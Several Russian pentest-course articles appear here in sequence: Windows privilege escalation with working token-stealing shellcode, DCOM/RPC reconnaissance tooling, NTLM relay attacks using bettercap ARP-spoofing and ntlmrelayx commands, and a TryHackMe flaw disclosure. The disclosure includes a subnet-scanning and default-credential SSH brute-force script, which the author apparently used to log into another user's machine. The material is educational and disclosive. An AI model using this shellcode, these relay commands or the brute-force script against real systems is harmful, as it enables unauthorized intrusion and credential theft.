Тестирование на проникновение

Для будущих студентов курса "Пентест. Практика тестирования на проникновение" подготовили авторскую статью от нашего эксперта - Александра Колесникова.

Также приглашаем записаться на открытый вебинар по теме "Windows ad: сбор информации, эскалация привилегий. Эксплойты и уязвимости последних 5 лет."

Тема получения безграничного доступа к системе очень интересна в контексте тестирования на проникновение. Получить доступ к системе и запустить команду сегодня это только половина победы. Вторая половина достигается только в тот момент, когда удается обойти подсистемы песочниц и ограничений, которые есть в операционной системе.

Эта статья расскажет о некоторых особенностях эксплойтов для повышения привилегий в операционной системе Windows.

Privileges in Windows

Для понимания, как работает эскалаций привилегий, необходимо разобраться с разграничением доступа в операционной системе Windows. Описание системы разграничения доступа можно найти на официальном сайте. Согласно документации, разграничение доступа в ОС Windows строится на следующих понятиях:

• Пользователи

• Группы

У каждого из перечисленных объектов есть свой индивидуальный идентификатор SID. Вообще, этот идентификатор используется для обозначения любого объекта, с которым работает операционная система, и для него требуется контроль доступа, но нас интересует в первую очередь использование этого идентификатора в контексте пользователей, групп и их прав. Идентификатор используется для того, чтобы создать для пользователя токен доступа. Данный токен содержит информацию о том, какие права имеет пользователь и группы, в которые он входит. Токен будет использоваться для подтверждения или запрета действий над объектами операционной системы, называемыми Securable Objects. Токены доступа бывают:

• Primary token токен, которым наделяет пользователь процесс, когда запускает приложение.

• Impersonation token токен, который может работать от имени любого пользователя операционной системы. Также может применяться для клиент-серверного взаимодействия или для запуска потока процесса с другими привилегиями.

Отсюда становится ясно, что основная цель любой эскалации привилегий это получение токена доступа, который создается привилегированными пользователями. В общем случае, в ОС Windows это стандартные пользователи, которые называются: Administrator и System. Именно их токены открывают двери к любой информации, которая есть в операционной системе.

Из официальной документации токен состоит из отдельных объектов:

Структура достаточно сложная и просто так скопировать или модифицировать ее не получится из-за того, что токен хранится в защищенном от модификации месте (как сказано в документации). Выясним, где она находится. Для этого запустим операционную систему Windows в отладочном режиме и исследуем все структуры, которые используются для работы процесса. Если обратиться снова к официальной документации, то начинать стоит со структуры EPROCESS.

Получается, что информация о токене процесса хранится в ядре и поэтому в документации это помечено как область, которую нельзя изменить. Теоретически это действительно так: обычные приложения, которые работают в 3-м кольце, не могут модифицировать то, что хранится в 0-м. Но если модифицировать из ядра структуру внутри ядра, то здесь нет никаких ограничений и противоречий. Обратимся к отладчику:

Жирным цветом выделен адрес структуры EPROCESS, чтобы изучить её более подробно вызовем команду отладчика:

Похоже, что и искать долго не придется, токен находится буквально сразу. В 64-битных операционных системах ссылка на него находится по смещению 0x208. Чтобы ее прочитать нужно маскировать адрес:

Это адрес, который необходимо маскировать полностью, кроме последнего байта:

Над адресом токена нужно вызвать одноименную команду и мы можем убедиться, что действительно, как указано в документации, токен содержит информацию, которая была заявлена:

Из рисунка видно, что все привилегии, которые содержит токен, располагаются в виде битовой маски и имеют названия, которые начинаются с префикса Se. Именно эти поля нам и нужно модифицировать, чтобы операционная система позволяла процессу читать что угодно в операционной системе. Определившись с целью, время поговорить об атаках на набор привилегий, уязвимостях и экспортах к ним.

LPE или что делать с токеном

Изменение привилегий в токене может быть весьма тривиальной задачей несмотря на то, что эти самые привилегии очень сложно структурированы. Основной атакой, которую применяют для эскалации привилегий - перезапись ссылки на токен, которая содержится в структуре EPROCESS. Иными словами токен не изменяется, меняется адрес, где лежит токен. Обычно этот адрес выбирается из системного процесса, который постоянно может присутствовать в операционной системе. Результатом такой операции становится процесс или отдельный поток, который может делать в ОС всё, что угодно. Ниже приведем пример кода, который позволяет произвести кражу токена:

[BITS 64] start:    mov rdx, [gs:188h]      ;get _ETHREAD указатель из KPCR    mov r8, [rdx+70h]       ;_EPROCESS    mov r9, [r8+188h]       ;ActiveProcessLinks начало списка     mov rcx, [r9]           ;найти первый процесс в спискеfind_system_proc:    mov rdx, [rcx-8]        ;смещение от ActiveProcessLinks до UniqueProcessId    cmp rdx, 4              ;System процесс    jz found_it    mov rcx, [rcx]          ;переходим по _LIST_ENTRY Flink указателю    cmp rcx, r9                jnz find_system_proc found_it:    mov rax, [rcx+80h]      ;смещение ActiveProcessLinks до токена    and al, 0f0h            ;очищаем 4 бита _EX_FAST_REF структуры    mov [r8+208h], rax      ;заменить токен текущего процесса системным    ret

Приведенный выше код позволяет скопировать токен для текущего процесса из системного процесса с идентификатором 4. Стоит отметить, что код должен быть запущен в контексте ядра операционной системы. Это означает, что он либо должен быть выполнен драйвером, либо шелкодом, который будет загружаться в память через уязвимость операционной системы.

Уязвимости и эксплойты

Операционная система Windows, как и любая другая сложная система, насчитывает миллионы строк кода. И, как в любом большом проекте, его размер не позволяет исключать ошибки и недочеты. На картинке ниже представлена статистика найденных в ОС уязвимостей последних 5 лет. В нее включены уязвимости для повышения привилегий:

Данные об уязвимостях взяты отсюда. Статистика показывает, что уязвимостей достаточно, чтобы можно было найти себе необходимую для повышения привилегий. Для исследования будем использовать готовые эксплойты. Попробуем восстановить последовательность действий, которые проводятся для достижения цели - эскалации привилегий. Список уязвимостей будет следующим:

• CVE-2015-2546

• CVE-2016-3309

• CVE-2017-0101

• CVE-2018-8120

• CVE-2019-1458

• CVE-2020-0796

CVE-2015-2546

Уязвимость в Win32k модуле операционной системы, повреждение памяти. Фрагмент эксплойта, который отвечает за изменение токена процесса:

Кажется, это тот самый код, который был представлен выше. В нем видоизменен подход к поиску токена, но основная идея та же получить ссылку на токен из процесса с PID=4(System.exe).

CVE-2016-3309

Уязвимость в Win32k, снова проблема с повреждением памяти, взглянем на кусок кода, который используется для замены токена:

В этом случае автор использовал язык программирования C, так же была изменена часть поиска адреса токена, но снова методика замены токена перезапись адреса из системного процесса.

CVE-017-0101

Уязвимость в user32 GDI объектах и снова повреждение памяти. Код замены токена:

Код скопирован из эксплойта 2016 года, похоже, что на этот период примитивы для проведения эскалаций привилегий еще пока что не митигировались в Windows.

CVE-2018-8120

Уязвимость в Win32k компоненте, в этот раз неверно обрабатывается nullpointer, код для замены токена:

Автор эксплойтов явно не спешит использовать что-то другое или хотя бы новое. Снова код, который ищет System.exe и использует его токен.

CVE-2019-1458

Уязвимость в Win32k, повреждение памяти, код замены токена:

Вот и первые изменения, автор больше не мог использовать код, который его выручал на протяжении 3х лет. Теперь токен заменяется через примитивы, которые использовались для эксплуатации уязвимостей в Windows 10 метод Bitmap. По механике он делает тоже самое, но достигается это за счет использования объектов подсистемы Win32k.

CVE-2020-0796

Уязвимость в драйвере, который обрабатывает SMBv3 запросы. Проблема таилась в переполнении целочисленного типа, который отвечал за количество выделяемой памяти в ядре. Код замены токена:

Случай с этой уязвимостью особенный. В первую очередь потому, что замена и перезапись токена осуществляется за 1 проход при получении неверно сформатированного запроса по SMBv3, поэтому в исходнике не происходит никаких дополнительных вычислений и действий по отношению к токену System.exe и процесса пользователя.

Вместо заключения

При тестировании на проникновение часто возникает необходимость использовать тот или иной публичный эксплойт на эскалацию привилегий. При этом не всегда можно найти подробное описание эксплойта и привести его в работоспособное состояние. Надеюсь, эта статья помогла вам увидеть шаблоны, которые применяются для написания эксплойтов, и теперь разбираться в них станет чуточку легче. К тому же, как показывает описание выше, способов на повышение привилегий не так много, а именно один изменение ссылки на токен процесса. Все остальное это просто модификации способа как ссылку можно перезаписать.

Узнать подробнее о курсе "Пентест. Практика тестирования на проникновение".

Записаться на открытый вебинар по теме "Windows ad: сбор информации, эскалация привилегий. Эксплойты и уязвимости последних 5 лет."

Построение карты сети это длительный процесс. Исследование происходит за счет отслеживания откликов операционных систем на испорченные данные в заголовках сетевых протоколов. Этот подход обычно дает ~ 80% точности. И довольно сложно найти информацию о том, как точно каждая ОС отзывается на подобные воздействия. А что, если будет технология или функция операционной системы, которая на 100% точно будет говорить о состоянии сетевой подсистемы и сообщать дополнительную информацию? Статья расскажет о таких функциях ОС Windows.

Старые как мир технологии

Чтобы получить полную картину того, как ОС Windows представляет свои функции в сети, нужно вспомнить о таких механизмах, как DCOM и RPC.

Remote Procedure Call механизм межпроцессного взаимодействия (IPC). Механизм позволяет обмениваться информацией и вызывать функции в разных процессах в рамках ОС, локальной сети или через Интернет.

Distributed Component Object Model спецификация COM объектов, которая регламентирует правила взаимодействия в сети между объектами. В документации можно встретить формулировку DCOM Remote Protocol.

Два механизма соотносятся по следующей схеме:

Схема взята отсюда

Как это работает? Общая схема работы протокола представлена ниже.

Схема взята отсюда

Основная идея организация взаимодействия осуществляется по клиент-серверной модели. Клиент может запросить по идентификатору запуск процедуры через RPC на сервере. При этом сервер должен самостоятельно произвести поиск нужного обработчика для идентификатора и, если он найден, передать ему информацию в соответствии с моделью безопасности. Затем информация о доступности и, по возможности, результат возвращается клиенту.

Кстати, о модели безопасности, на схеме красными прямоугольниками выделены те интерфейсы, которые в некоторых случаях можно использовать без прохождения процедуры авторизации.

Что интересного для карты сети

DCOM для Offensive уже изучался на BlackHat 2004. В выступлении было очень много информации, которая может быть использована для версий Windows вплоть до Windows Server 2003. Вот список некоторых действий, которые можно выполнять:

• Сбор информации о конфигурации ОС (не требует авторизации);

• Перебор паролей для учетных данных пользователей;

• Отправка запроса на создание задач ScheduledTask, а так же удаление, просмотр;

• Просмотр состояния сервисов (авторизация требуется).

Выступление рассказывало уже о конкретных идентификаторах, которые можно использовать для воздействий на ОС. Попробуем выяснить, всё ли так же работает спустя 17 лет, заодно и узнаем как получить конфигурацию сетевой подсистемы ОС.

Практика

Для эксперимента будем использовать 3 виртуальные машины:

• Windows 10

• Windows 7

• Windows 8

Каждая виртуальная машина будет подключена как минимум к двум сетям, которые будут включать в себя разные сегменты. Тестовой виртуальной машиной станет Kali Linux. Попробуем собрать скрипты и приложения для сбора информации о системе посредством RPC. Список инструментов представлен ниже:

• nmap script rpcinfo.nse - собирает порты rpc и пишет, по возможности имя сервиса, который их использует;

• impacket rpcdump.py - получает информацию из rcp сервисов;

• impacket rpcmap.py - собирает endpoint порты, которые ожидают коннекта;

• Metasploit module auxiliary/scanner/dcerpc/endpoint_mapper - поиск endpoint;

• Metasploit module auxiliary/scanner/dcerpc/hidden - поиск скрытого сервиса;

• Metasploit module auxiliary/scanner/dcerpc/management - получение данный из RMI DCERPC;

• Metasploit module auxiliary/scanner/dcerpc/tcp_dcerpc_auditor - поиск названий сервисов, которые используют DCERPC;

• IOXIDResolver.py - скрипт для получения данных о конфигурации сетевой подсистемы;

Попробуем работоспособность инструментов на виртуальных машинах:

Windows 7

Результаты nmap:

Результаты Metasploit:

Hidden services

Management

TCP Auditpr

Результаты IOXIDResolver:

Windows 8

Результаты nmap:

Результаты Metasploit:

endpoint_mapper

Hidden services

Management

TCP auditor

Результаты IOXIDResolver:

Windows 10

Результаты nmap:

Результаты Metasploit:

Hidden services

Management

TCP auditor

Результаты IOXIDResolver:

Рассмотренные в статье механизмы не просто до сих пор работают, но и развиваются. Из перечисленных инструментов IOXIDResolver может позволить получить данные о настройке сетевой подсистемы, а другие инструменты могут помочь определить версию ОС и, при недостаточной конфигурации, возможность управления ОС или получения учетных данных пользователей.

Статья подготовлена Александром Колесниковым, преподавателем курса Пентест. Практика тестирования на проникновение. Если интересно узнать о курсе больше, приходите на день открытых дверей онлайн, где Александр расскажет о формате и программе обучения.

Статья расскажет о том, какие Relay атаки существуют на сегодняшний день и как их воспроизводить, какие основные инструменты для проведения данных атак при тестировании на проникновение можно использовать, а также будет рассмотрена Relay атака на Active Directory.

Что такое Relay

Relay атаки известны достаточно давно. Если ввести в поисковике "Relay attacks", то можно найти много страниц, которые были созданы около 20 лет назад. В компьютерной литературе термин Relay используется для обозначения процесса повторной передачи данных. В этом процессе информацию для повторения просто пересылают на указанный адрес. Тот, кто передаёт информацию, не обязательно должен её разбирать семантически или структурно, он просто является посредником. Определение достаточно простое, но реализация порой сопряжена с большим количеством особенностей и ограничений.

Основным условием проведения атаки является то, что атакующий перед началом "повторения" должен находиться посередине соединения, то есть контролировать или хотя бы наблюдать процесс передачи информации. Для такого состояния существует отдельный термин MitM. По факту это еще одна атака, которая используется для запуска Relay.

Почему Relay атаки существуют и где применяются? Любая информационная система должна регламентировать правила безопасной передачи информации между участниками обмена. Правила должны включать как защиту данных от утечки, так и правила разграничения доступа к информации между участниками системы. Первая задача в системах обычно решается с помощью криптографических методов преобразования, а вторая за счет использования специальных идентификаторов, которые в рамках системы имеют уникальные характеристики и позволяют идентифицировать учетные данные пользователя, который владеет идентификатором. Очень часто эти идентификаторы используются для реализации механизмов криптографии.

Relay атака подразумевает просто процесс повторения передачи данных, то есть ее шаблон хорошо подходит для того, чтобы влиять на состояние систем, даже не имея к ним прямого доступа. Особенно это актуально, если в системе используется криптографические методы защиты. Однако, если правильно применить атаку, то можно получать доступ к системе, запускать механизмы обработки данных, вызывать проблемы в функционировании систем. Известны примеры успешных Relay атак на корпоративные системы управления доступом, системы NFS, и т.д. В статье будем фокусироваться на Relay атаках, которые применимы для систем под управлением Windows AD.

Windows AD

Relay атаки Windows AD существуют практически столько же, как и сама система. Возможность их проведения существует потому, что системы использует свой собственный механизм SSO. Данный механизм позволяет пользователям обращаться к ресурсам системы. При правильном "направлении" запросов на получение доступа к ресурсу за счёт SSO, атакующий может получить доступ к ресурсу от имени пользователя, которого он "направил". При этом атакующему не нужно будет знать ни учетных данных, ни идентификаторов, которые используются в системе.

Официальной систематизации при описании Relay атак на Windows AD нет, поэтому будем использовать следующую классификацию:

• Классческие Relay атаки данные пересылаются только по сети, без дополнительной обработки хоста

• Гибридные Relay атаки Rouge Potato, Relay Potato

Попробуем разобраться, что каждая атака из себя представляет.

Атаки и инструменты

Классические Relay атаки для работы атаки необходимо:

• Просканировать сеть и получить список сервисов. Нужны расшаренные директории через SMB, HTTP сервера, LDAP сервера.

• Установить слушателя для локальных соединений или провести атаку на маршрутизацию данных в сети

Набор инструментов, которые можно использовать:

• impacket

• responder

• mitm6

• bettercap

• Rouge Potato

• Remote Potato

• StreamDivert

Успех атаки зависит от того, как настроены перечисленные выше сервисы. Все инструменты заточены на использование при схеме авторизации через NTLM протокол. Таким образом, основная задача при проведении атаки это переповторение процедуры обмена NTLM Challenge. (Не будет работать при использовании процедуры подписи запросов).

Возможные вектора атак: SMB->SMB,HTTP/HTTPs, LDAP/LDAPs, MSSQL, POP3, IMAP/s, SMTP.

Сценарий атаки:

Пользовательская система не содержит известных уязвимостей. Пользователь периодически пользуется HTTP веб-сервером и файловым обменником. Атакующий проводит атаку типа ARP Cache Poison. В bettercap можно запустить команду так:

set arp.spoof.targets 192.168.56.15set arp.spoof.internal truearp.ban on

В результате все запросы, которые отправляет машина пользователя, передает данные через машину атакующего. Можно запустить инструмент ntlmrelayx из набора скриптов impacket и ждать обращения на обменник:

python3 ntlmrelayx.py -t smb://192.168.56.25 -smb2support -socks

В итоге у нас появится командная строка ntlmrelayx и можно дампить данные и отправлять команды в целевую систему от имени пользователя.

Гибридные атаки модифицированная версия атак, которая позволяет задействовать дополнительные механизмы ОС для управления процедурой авторизации.

Rouge Potato атака использует методы делегирования дескриптора безопасности. Для проведения атаки используется механизм DCOM OXID Resolver запросы к нему заворачиваются через named pipes и в результате атакующий получает возможность запускать команды в системе от имени пользователя "NETWORK SERVICE" в дальнейшем токен можно проапгрейтить до токена "SYSTEM".

Атаку можно провести с помощью инструмента RougePotato. Инструмент используется для повышения привилегий в системе, то есть Relay происходит только на уровне механизмов ОС. Провести эту атаку без хотя бы минимального доступа к командной строке ОС не получится.

Remote Potato модификация атаки Remote Potato, где обходится механизм запрета на запрос данных из ресурса без авторизации посредством DCOM механизма ResolveOxid2. Для этой атаки также необходимо иметь минимальный доступ к системе, так как при процедуре запроса токена происходит обращение к сервису через локальный IXOD Resolver.

Заключение

Несмотря на то, что Relay атаки известны уже давно, на данный момент они остаются все еще актуальными для информационных систем. В частности, администраторам безопасности Active Directory рекомендуется включить подпись запросов NTLM протокола во избежании взлома системы с помощью данного метода.

Статью подготовил Александр Колесников в рамках курса Пентест. Практика тестирования на проникновение. Если вам интересно узнать больше о формате и программе обучения, приглашаем на день открытых дверей онлайн.

Привет, Хабрчане. Сегодня мы поговорим об одной проблеме, которую обнаружил мой хороший знакомый Иван Глинкин.

Это очень серьезный косяк с безопасностью платформы для обучения пентесту TryHackMe. Заключается он в том, что виртуальные стенды видят абсолютно все в сети, и их можно использовать для атаки на пользователей сервиса.

Написать эту статью меня подтолкнули 3 причины:

1. Прошло уже более двух недель, а воз и ныне там. Никаких действий со стороны платформы TryHackMe не последовало;

2. Платформа ответила только хамством, а затем забанила аккаунт Ивана (об этом далее);

3. Автору оригинала очень лень переписывать статью на русском языке.

Завязка сюжета

Есть много разных платформ для обучения инфобезу. И коль скоро эти платформы затрагивают такой важный в IT-отрасли сегмент, то неплохо было бы им самим соответствовать. Так мы думаем, когда заходим на них.

Однако, как показала практика, тут тоже работает славный принцип х*як, х*як, и в продакшн.

Когда мы подключаемся по VPN к платформе, мы не можем взаимодействовать с другими хостами в сети, кроме самих виртуальных машин для взлома. Верно? Верно!

Ну, а что по поводу самих виртуальных стендов? Они-то, наверное, тоже не могут взаимодействовать с кем попало?

А вот и нет! Виртуальный стенд, как оказалось, видит всех и вся в сети.

В качестве тестовой точки я выбрал виртуалку Basic Pentesting.

Быстренько получив пользователя kay по сюжету виртуалки, начнем проверять, как же TryHackMe решила проблему с тем, что виртуалка может взаимодействовать с абсолютно всеми пользователями. Проверяем свою же подсеть. В моем случае это была 10.9.5.0

for ip in {1..254}; do ping -w 1 10.9.5.$ip | grep -i "ttl"; done

Жизнь есть. Так, а другие подсети видим? Ну, например, 10.9.4.0

Видим ...

Так, отставить панику! Это же еще ничего не доказывает и не значит, что я смогу подключиться по SSH или проверить, есть ли там поднятый Apache.

Сводим все живые IP адреса в вордлист и пробегаем их nc по 80 порту, благо nc заботливо установлен админами платформы.

for ip in $(cat ips.txt); do nc -nvw 1 $ip 80; done

А вот и первые претенденты. CURLлуем 10.9.4.252 и видим там типичный листинг директории www человека, который решает виртуалки:

Кульминация

А вот давайте и проверим, че там по SSH. Тут тоже применим немножко автоматизации. Закидываем на стенд sshpass, благо и curl, и wget уже заботливо установлены админами платформы заранее. Как говорится, всё для вас, даже вода из-под крана.

Опа! Не ставится.

Ну root-то точно на стенде закрыт! Для итогового выполнения упражнения стенда root не нужен, а, стало быть, и у пользователя kay не должно быть прав на sudo. Верно же?

Устанавливаем sshpass и колдуем легкий скрипт в bash для перебора:

#!/bin/bashfor ip in {2..255}do ip_check=$(ping -w 1 10.9.5.$ip | grep -i "icmp_seq" | cut -d " " -f 4 | cut -d ":" -f 1)if [ ! -z $ip_check ]thenecho -e "\e[01;32mHost $ip_check is up. Cheking SSH\e[00m";nc -vz -w 2 $ip_check 22 > log.txt 2>&1;ssh_refused=$(grep -o "refused" log.txt)ssh_timeout=$(grep -o "timed" log.txt)if [ ! -z $ssh_refused ]thenecho -e "\e[01;31mSSH is closed. Going further. \e[00m";echo " ";elif [ ! -z $ssh_timeout ]thenecho -e "\e[01;31mSSH doesn't respond. Going further. \e[00m";echo " ";elseecho -e "\e[01;32mSSH is open. Trying to connect... \e[00m";sshpass -p "kali" ssh -o StrictHostKeyChecking=no kali@$ip_check;sshpass -p "toor" ssh -o StrictHostKeyChecking=no user@$ip_check;sshpass -p "toor" ssh -o StrictHostKeyChecking=no root@$ip_check;echo " ";fifidonerm log.txt;echo -e "\e[01;32mEnumeration has been finished! \e[00m";

Развязка

Проверять будем 3 самые основные связки логин/пароль для Kali и Parrot OS:

• kali:kali

• root:toor

• user:toor

А вот и первый БЕЗОПАСНИК с дефолтными логином и паролем. И сразу натыкаемся на ovpn файл для доступа к TryHackMe. Если у человека оплачен VIP, то мы только что сэкономили на подписке

Пробуем sudo

Эпилог

Какие из всего этого следуют практические выводы?

Ну, самый очевидный: система инфобеза TryHackMe полное **** нужно менять дефолтные пароли на своих Kali и Parrot OS на более безопасные. Обезопасит ли это в полной мере вас при вот таком вот уровне защиты сети на платформе TryHackMe? Определённо нет.

Думаю, мне не стоит тут перечислять, что, помимо простого брутфорса SSH, существует еще куча методов получить доступ к вашей системе. А дальше можете выбрать, что злоумышленник захочет:

1. Включить вашу рабочую машину в ботнет;

2. Покопаться во внутрикорпоративной сети компании и вашей личной инфе;

3. Провести атаки на другие ресурсы с использованием вашей пентест-машины и из-под вашего IP;

4. Помайнить криптовалюты на вашем оборудовании (а почему бы, собственно, и нет?);

5. Всё, что пришло вам в голову к этому моменту

А также не забываем, что после перезагрузки стенда вся информация с него удаляется, в том числе и логи. Можно, конечно, уповать на то, что у TryHackMe всё обязательно логируется и записывается, особенно все действия пользователя на виртуалках, но что-то мне мало верится в реальность этого варианта.

Особенно меня порадовала реакция платформы TryHackMe на багрепорт всей этой ситуации.

Первичный отчет был направлен в TryHackMe 2 мая 2021. Оригинальная статья вышла 25 мая 2021. Вместо того, чтобы заняться решением этой проблемы, руководство платформы TryHackMe прислало письмо, в котором просто решило прикрыться пунктом 9 правил пользования платформой.

TryHackMe на полном серьёзе считает, что всё у них нормально, и что вместо принятия технических мер можно ограничиться вот этой вот писулькой в правилах пользования платформой. Она как-то сможет оградить пользователей от реальных злоумышленников?

Ну и вишенка на торте:

Бан аккаунта. Отличная работа, TryHackMe. Вместо решения проблемы вы просто забанили человека, который указал вам на косяк в системе инфобеза

Решайте сами, стоит ли пользоваться вот такими образовательными порталами, которые спокойно позволяют взламывать своих пользователей.

Лично моё мнение: в случае реальной атаки на вас платформа просто открестится от ответственности всё тем же замечательным пунктом 9 своего соглашения.

Ну а что? Это же не платформа положила болт на защиту пользователей, а злоумышленник, наплевав на все писульки TryHackMe, просто взял и использовал ваш Kali для противоправных действий в адрес третьих лиц.